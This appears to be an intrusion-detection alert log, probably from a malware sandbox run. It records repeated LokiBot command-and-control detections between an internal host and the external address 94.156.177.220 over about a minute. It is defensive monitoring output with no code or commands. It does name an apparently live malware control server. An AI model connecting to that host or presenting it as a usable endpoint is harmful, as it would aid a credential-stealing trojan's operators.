2024-10-25T11:29:59.823541+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64220	TCP
2024-10-25T11:30:00.968169+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64221	TCP
2024-10-25T11:30:02.104886+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64222	TCP
2024-10-25T11:30:03.223599+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64223	TCP
2024-10-25T11:30:04.405716+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64224	TCP
2024-10-25T11:30:05.546749+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64225	TCP
2024-10-25T11:30:06.675106+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64226	TCP
2024-10-25T11:30:07.804717+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64227	TCP
2024-10-25T11:30:08.941234+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64228	TCP
2024-10-25T11:30:10.471171+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64229	TCP
2024-10-25T11:30:11.706930+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64230	TCP
2024-10-25T11:30:12.832436+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64231	TCP
2024-10-25T11:30:13.989086+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64232	TCP
2024-10-25T11:30:15.124611+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64233	TCP
2024-10-25T11:30:16.300204+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64234	TCP
2024-10-25T11:30:17.417395+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64235	TCP
2024-10-25T11:30:18.538253+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64236	TCP
2024-10-25T11:30:19.660188+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64237	TCP
2024-10-25T11:30:20.787635+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64238	TCP
2024-10-25T11:30:21.924451+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64239	TCP
2024-10-25T11:30:23.053912+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64240	TCP
2024-10-25T11:30:24.203953+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64241	TCP
2024-10-25T11:30:25.482192+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64242	TCP
2024-10-25T11:30:26.591282+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64243	TCP
2024-10-25T11:30:27.726410+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64244	TCP
2024-10-25T11:30:29.297913+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64245	TCP
2024-10-25T11:30:30.441298+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64246	TCP
2024-10-25T11:30:31.567960+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64247	TCP
2024-10-25T11:30:32.708372+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64248	TCP
2024-10-25T11:30:33.865505+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64249	TCP
2024-10-25T11:30:35.003790+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64250	TCP
2024-10-25T11:30:36.115790+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64251	TCP
2024-10-25T11:30:37.265204+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64252	TCP
2024-10-25T11:30:38.398841+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64253	TCP
2024-10-25T11:30:39.537374+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64254	TCP
2024-10-25T11:30:40.667186+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64255	TCP
2024-10-25T11:30:41.788530+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64256	TCP
2024-10-25T11:30:42.964660+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64257	TCP
2024-10-25T11:30:44.098251+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64258	TCP
2024-10-25T11:30:45.238546+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64259	TCP
2024-10-25T11:30:46.409591+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64260	TCP
2024-10-25T11:30:47.534705+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64261	TCP
2024-10-25T11:30:48.680704+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64262	TCP
2024-10-25T11:30:49.844254+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64263	TCP
2024-10-25T11:30:50.996515+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64264	TCP
2024-10-25T11:30:52.169518+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64265	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T11:28:51.833344+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49701	94.156.177.220	80	TCP
2024-10-25T11:28:53.208596+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49703	94.156.177.220	80	TCP
2024-10-25T11:28:54.617931+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49704	94.156.177.220	80	TCP
2024-10-25T11:28:55.862679+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49705	94.156.177.220	80	TCP
2024-10-25T11:28:56.975286+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49706	94.156.177.220	80	TCP
2024-10-25T11:28:58.095968+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49707	94.156.177.220	80	TCP
2024-10-25T11:28:59.234508+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49708	94.156.177.220	80	TCP
2024-10-25T11:29:00.353219+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49709	94.156.177.220	80	TCP
2024-10-25T11:29:01.531090+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	49710	94.156.177.220	80	TCP
2024-10-25T11:29:02.646751+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64167	94.156.177.220	80	TCP
2024-10-25T11:29:03.801675+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64168	94.156.177.220	80	TCP
2024-10-25T11:29:04.946367+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64169	94.156.177.220	80	TCP
2024-10-25T11:29:06.259464+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64170	94.156.177.220	80	TCP
2024-10-25T11:29:07.385590+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64171	94.156.177.220	80	TCP
2024-10-25T11:29:08.519765+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64172	94.156.177.220	80	TCP
2024-10-25T11:29:09.656572+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64173	94.156.177.220	80	TCP
2024-10-25T11:29:10.777113+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64174	94.156.177.220	80	TCP
2024-10-25T11:29:11.912301+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64175	94.156.177.220	80	TCP
2024-10-25T11:29:13.065589+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64176	94.156.177.220	80	TCP
2024-10-25T11:29:14.182972+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64177	94.156.177.220	80	TCP
2024-10-25T11:29:15.289955+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64178	94.156.177.220	80	TCP
2024-10-25T11:29:16.463604+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64179	94.156.177.220	80	TCP
2024-10-25T11:29:17.580609+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64180	94.156.177.220	80	TCP
2024-10-25T11:29:18.746894+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64181	94.156.177.220	80	TCP
2024-10-25T11:29:19.869747+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64182	94.156.177.220	80	TCP
2024-10-25T11:29:20.985354+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64183	94.156.177.220	80	TCP
2024-10-25T11:29:22.146065+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64184	94.156.177.220	80	TCP
2024-10-25T11:29:23.266375+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64185	94.156.177.220	80	TCP
2024-10-25T11:29:24.375334+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64186	94.156.177.220	80	TCP
2024-10-25T11:29:25.510311+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64187	94.156.177.220	80	TCP
2024-10-25T11:29:26.642221+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64188	94.156.177.220	80	TCP
2024-10-25T11:29:27.763093+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64189	94.156.177.220	80	TCP
2024-10-25T11:29:28.886582+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64190	94.156.177.220	80	TCP
2024-10-25T11:29:30.002398+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64191	94.156.177.220	80	TCP
2024-10-25T11:29:31.140397+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64192	94.156.177.220	80	TCP
2024-10-25T11:29:32.242203+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64193	94.156.177.220	80	TCP
2024-10-25T11:29:33.553138+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64194	94.156.177.220	80	TCP
2024-10-25T11:29:34.708315+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64195	94.156.177.220	80	TCP
2024-10-25T11:29:35.827262+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64196	94.156.177.220	80	TCP
2024-10-25T11:29:36.964819+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64197	94.156.177.220	80	TCP
2024-10-25T11:29:38.230014+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64198	94.156.177.220	80	TCP
2024-10-25T11:29:39.375943+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64199	94.156.177.220	80	TCP
2024-10-25T11:29:40.485305+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64201	94.156.177.220	80	TCP
2024-10-25T11:29:41.621225+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64202	94.156.177.220	80	TCP
2024-10-25T11:29:42.772430+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64203	94.156.177.220	80	TCP
2024-10-25T11:29:43.910911+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64204	94.156.177.220	80	TCP
2024-10-25T11:29:45.050226+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64206	94.156.177.220	80	TCP
2024-10-25T11:29:46.161588+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64208	94.156.177.220	80	TCP
2024-10-25T11:29:47.318468+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64209	94.156.177.220	80	TCP
2024-10-25T11:29:48.436662+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64210	94.156.177.220	80	TCP
2024-10-25T11:29:49.624131+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64211	94.156.177.220	80	TCP
2024-10-25T11:29:50.760103+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64212	94.156.177.220	80	TCP
2024-10-25T11:29:51.899613+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64213	94.156.177.220	80	TCP
2024-10-25T11:29:53.042747+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64214	94.156.177.220	80	TCP
2024-10-25T11:29:54.179032+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64215	94.156.177.220	80	TCP
2024-10-25T11:29:55.303001+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64216	94.156.177.220	80	TCP
2024-10-25T11:29:56.409678+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64217	94.156.177.220	80	TCP
2024-10-25T11:29:57.542324+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64218	94.156.177.220	80	TCP
2024-10-25T11:29:58.688177+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64219	94.156.177.220	80	TCP
2024-10-25T11:29:59.817721+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64220	94.156.177.220	80	TCP
2024-10-25T11:30:00.962221+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64221	94.156.177.220	80	TCP
2024-10-25T11:30:02.098478+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64222	94.156.177.220	80	TCP
2024-10-25T11:30:03.217205+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64223	94.156.177.220	80	TCP
2024-10-25T11:30:04.399581+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64224	94.156.177.220	80	TCP
2024-10-25T11:30:05.540849+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64225	94.156.177.220	80	TCP
2024-10-25T11:30:06.669292+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64226	94.156.177.220	80	TCP
2024-10-25T11:30:07.799168+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64227	94.156.177.220	80	TCP
2024-10-25T11:30:08.935586+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64228	94.156.177.220	80	TCP
2024-10-25T11:30:10.470620+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64229	94.156.177.220	80	TCP
2024-10-25T11:30:11.701063+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64230	94.156.177.220	80	TCP
2024-10-25T11:30:12.826647+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64231	94.156.177.220	80	TCP
2024-10-25T11:30:13.983244+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64232	94.156.177.220	80	TCP
2024-10-25T11:30:15.118902+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64233	94.156.177.220	80	TCP
2024-10-25T11:30:16.294453+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64234	94.156.177.220	80	TCP
2024-10-25T11:30:17.411489+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64235	94.156.177.220	80	TCP
2024-10-25T11:30:18.532406+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64236	94.156.177.220	80	TCP
2024-10-25T11:30:19.654275+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64237	94.156.177.220	80	TCP
2024-10-25T11:30:20.781593+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64238	94.156.177.220	80	TCP
2024-10-25T11:30:21.918750+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64239	94.156.177.220	80	TCP
2024-10-25T11:30:23.048033+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64240	94.156.177.220	80	TCP
2024-10-25T11:30:24.197759+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64241	94.156.177.220	80	TCP
2024-10-25T11:30:25.471211+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64242	94.156.177.220	80	TCP
2024-10-25T11:30:26.585470+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64243	94.156.177.220	80	TCP
2024-10-25T11:30:27.719981+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64244	94.156.177.220	80	TCP
2024-10-25T11:30:29.297651+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64245	94.156.177.220	80	TCP
2024-10-25T11:30:30.435133+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64246	94.156.177.220	80	TCP
2024-10-25T11:30:31.558444+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64247	94.156.177.220	80	TCP
2024-10-25T11:30:32.702432+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64248	94.156.177.220	80	TCP
2024-10-25T11:30:33.859385+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64249	94.156.177.220	80	TCP
2024-10-25T11:30:34.998099+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64250	94.156.177.220	80	TCP
2024-10-25T11:30:36.108883+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64251	94.156.177.220	80	TCP
2024-10-25T11:30:37.259328+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64252	94.156.177.220	80	TCP
2024-10-25T11:30:38.392292+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64253	94.156.177.220	80	TCP
2024-10-25T11:30:39.531711+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64254	94.156.177.220	80	TCP
2024-10-25T11:30:40.661278+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64255	94.156.177.220	80	TCP
2024-10-25T11:30:41.782183+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64256	94.156.177.220	80	TCP
2024-10-25T11:30:42.958639+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64257	94.156.177.220	80	TCP
2024-10-25T11:30:44.090835+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64258	94.156.177.220	80	TCP
2024-10-25T11:30:45.232719+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64259	94.156.177.220	80	TCP
2024-10-25T11:30:46.403777+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64260	94.156.177.220	80	TCP
2024-10-25T11:30:47.528668+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64261	94.156.177.220	80	TCP
2024-10-25T11:30:48.674432+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64262	94.156.177.220	80	TCP
2024-10-25T11:30:49.836930+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64263	94.156.177.220	80	TCP
2024-10-25T11:30:50.990800+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64264	94.156.177.220	80	TCP
2024-10-25T11:30:52.163502+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.18	64265	94.156.177.220	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T11:28:51.833344+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49701	94.156.177.220	80	TCP
2024-10-25T11:28:53.208596+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49703	94.156.177.220	80	TCP
2024-10-25T11:28:54.617931+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49704	94.156.177.220	80	TCP
2024-10-25T11:28:55.862679+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49705	94.156.177.220	80	TCP
2024-10-25T11:28:56.975286+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49706	94.156.177.220	80	TCP
2024-10-25T11:28:58.095968+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49707	94.156.177.220	80	TCP
2024-10-25T11:28:59.234508+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49708	94.156.177.220	80	TCP
2024-10-25T11:29:00.353219+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49709	94.156.177.220	80	TCP
2024-10-25T11:29:01.531090+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	49710	94.156.177.220	80	TCP
2024-10-25T11:29:02.646751+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64167	94.156.177.220	80	TCP
2024-10-25T11:29:03.801675+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64168	94.156.177.220	80	TCP
2024-10-25T11:29:04.946367+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64169	94.156.177.220	80	TCP
2024-10-25T11:29:06.259464+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64170	94.156.177.220	80	TCP
2024-10-25T11:29:07.385590+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64171	94.156.177.220	80	TCP
2024-10-25T11:29:08.519765+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64172	94.156.177.220	80	TCP
2024-10-25T11:29:09.656572+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64173	94.156.177.220	80	TCP
2024-10-25T11:29:10.777113+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64174	94.156.177.220	80	TCP
2024-10-25T11:29:11.912301+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64175	94.156.177.220	80	TCP
2024-10-25T11:29:13.065589+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64176	94.156.177.220	80	TCP
2024-10-25T11:29:14.182972+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64177	94.156.177.220	80	TCP
2024-10-25T11:29:15.289955+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64178	94.156.177.220	80	TCP
2024-10-25T11:29:16.463604+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64179	94.156.177.220	80	TCP
2024-10-25T11:29:17.580609+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64180	94.156.177.220	80	TCP
2024-10-25T11:29:18.746894+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64181	94.156.177.220	80	TCP
2024-10-25T11:29:19.869747+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64182	94.156.177.220	80	TCP
2024-10-25T11:29:20.985354+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64183	94.156.177.220	80	TCP
2024-10-25T11:29:22.146065+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64184	94.156.177.220	80	TCP
2024-10-25T11:29:23.266375+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64185	94.156.177.220	80	TCP
2024-10-25T11:29:24.375334+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64186	94.156.177.220	80	TCP
2024-10-25T11:29:25.510311+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64187	94.156.177.220	80	TCP
2024-10-25T11:29:26.642221+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64188	94.156.177.220	80	TCP
2024-10-25T11:29:27.763093+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64189	94.156.177.220	80	TCP
2024-10-25T11:29:28.886582+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64190	94.156.177.220	80	TCP
2024-10-25T11:29:30.002398+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64191	94.156.177.220	80	TCP
2024-10-25T11:29:31.140397+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64192	94.156.177.220	80	TCP
2024-10-25T11:29:32.242203+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64193	94.156.177.220	80	TCP
2024-10-25T11:29:33.553138+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64194	94.156.177.220	80	TCP
2024-10-25T11:29:34.708315+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64195	94.156.177.220	80	TCP
2024-10-25T11:29:35.827262+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64196	94.156.177.220	80	TCP
2024-10-25T11:29:36.964819+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64197	94.156.177.220	80	TCP
2024-10-25T11:29:38.230014+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64198	94.156.177.220	80	TCP
2024-10-25T11:29:39.375943+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64199	94.156.177.220	80	TCP
2024-10-25T11:29:40.485305+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64201	94.156.177.220	80	TCP
2024-10-25T11:29:41.621225+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64202	94.156.177.220	80	TCP
2024-10-25T11:29:42.772430+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64203	94.156.177.220	80	TCP
2024-10-25T11:29:43.910911+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64204	94.156.177.220	80	TCP
2024-10-25T11:29:45.050226+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64206	94.156.177.220	80	TCP
2024-10-25T11:29:46.161588+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64208	94.156.177.220	80	TCP
2024-10-25T11:29:47.318468+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64209	94.156.177.220	80	TCP
2024-10-25T11:29:48.436662+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64210	94.156.177.220	80	TCP
2024-10-25T11:29:49.624131+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64211	94.156.177.220	80	TCP
2024-10-25T11:29:50.760103+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64212	94.156.177.220	80	TCP
2024-10-25T11:29:51.899613+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64213	94.156.177.220	80	TCP
2024-10-25T11:29:53.042747+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64214	94.156.177.220	80	TCP
2024-10-25T11:29:54.179032+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64215	94.156.177.220	80	TCP
2024-10-25T11:29:55.303001+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64216	94.156.177.220	80	TCP
2024-10-25T11:29:56.409678+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64217	94.156.177.220	80	TCP
2024-10-25T11:29:57.542324+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64218	94.156.177.220	80	TCP
2024-10-25T11:29:58.688177+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64219	94.156.177.220	80	TCP
2024-10-25T11:29:59.817721+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64220	94.156.177.220	80	TCP
2024-10-25T11:30:00.962221+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64221	94.156.177.220	80	TCP
2024-10-25T11:30:02.098478+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64222	94.156.177.220	80	TCP
2024-10-25T11:30:03.217205+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64223	94.156.177.220	80	TCP
2024-10-25T11:30:04.399581+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64224	94.156.177.220	80	TCP
2024-10-25T11:30:05.540849+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64225	94.156.177.220	80	TCP
2024-10-25T11:30:06.669292+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64226	94.156.177.220	80	TCP
2024-10-25T11:30:07.799168+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64227	94.156.177.220	80	TCP
2024-10-25T11:30:08.935586+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64228	94.156.177.220	80	TCP
2024-10-25T11:30:10.470620+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64229	94.156.177.220	80	TCP
2024-10-25T11:30:11.701063+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64230	94.156.177.220	80	TCP
2024-10-25T11:30:12.826647+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64231	94.156.177.220	80	TCP
2024-10-25T11:30:13.983244+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64232	94.156.177.220	80	TCP
2024-10-25T11:30:15.118902+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64233	94.156.177.220	80	TCP
2024-10-25T11:30:16.294453+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64234	94.156.177.220	80	TCP
2024-10-25T11:30:17.411489+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64235	94.156.177.220	80	TCP
2024-10-25T11:30:18.532406+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64236	94.156.177.220	80	TCP
2024-10-25T11:30:19.654275+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64237	94.156.177.220	80	TCP
2024-10-25T11:30:20.781593+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64238	94.156.177.220	80	TCP
2024-10-25T11:30:21.918750+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64239	94.156.177.220	80	TCP
2024-10-25T11:30:23.048033+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.18	64240	94.156.177.220	80	TCP
